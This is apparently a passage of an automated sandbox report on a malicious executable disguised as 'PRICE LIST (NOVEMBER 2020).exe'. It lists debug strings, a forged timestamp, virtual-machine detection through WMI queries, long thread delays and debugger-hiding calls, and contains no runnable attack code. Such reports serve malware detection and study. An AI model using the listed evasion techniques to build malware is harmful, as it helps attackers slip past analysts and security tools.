                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wmswsock.pdbO source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: oleaut32.pdbJ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb.' source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdblo source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380581139.0000000000BFE000.00000004.00000020.sdmp
                  Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: .pdb88 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbi18 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wUxTheme.pdb+ source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.391966580.0000000004F62000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb^ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp

                  Data Obfuscation:

                  barindex
                  Binary contains a suspicious time stampShow sources
                  Source: initial sampleStatic PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_068D24EA pushfd ; ret 0_2_068D24ED
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_068D327A push eax; retf 0_2_068D327D
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00E4B597 push edi; retn 0000h8_2_00E4B599
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F88B75 pushad ; ret 8_2_00F88B83
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F8D9E4 push cs; ret 8_2_00F8D9E5
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F8D9D4 push cs; ret 8_2_00F8D9D5
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F8D9C4 push cs; ret 8_2_00F8D9C5
                  Source: initial sampleStatic PE information: section name: .text entropy: 6.84633802835
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWindow / User API: threadDelayed 385Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWindow / User API: threadDelayed 2952Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWindow / User API: threadDelayed 1389Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWindow / User API: threadDelayed 8463Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 7028Thread sleep count: 385 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 7028Thread sleep count: 2952 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6880Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6920Thread sleep count: 1389 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6920Thread sleep count: 8463 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603913545.0000000001015000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: WerFault.exe, 0000000B.00000002.416819094.0000000004944000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380633022.0000000000C40000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging:

                  barindex
                  Contains functionality to hide a thread from the debuggerShow sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027DA0D0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,000000000_2_027DA0D0
                  Hides threads from debuggersShow sources
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess queried: DebugPortJump to behavior
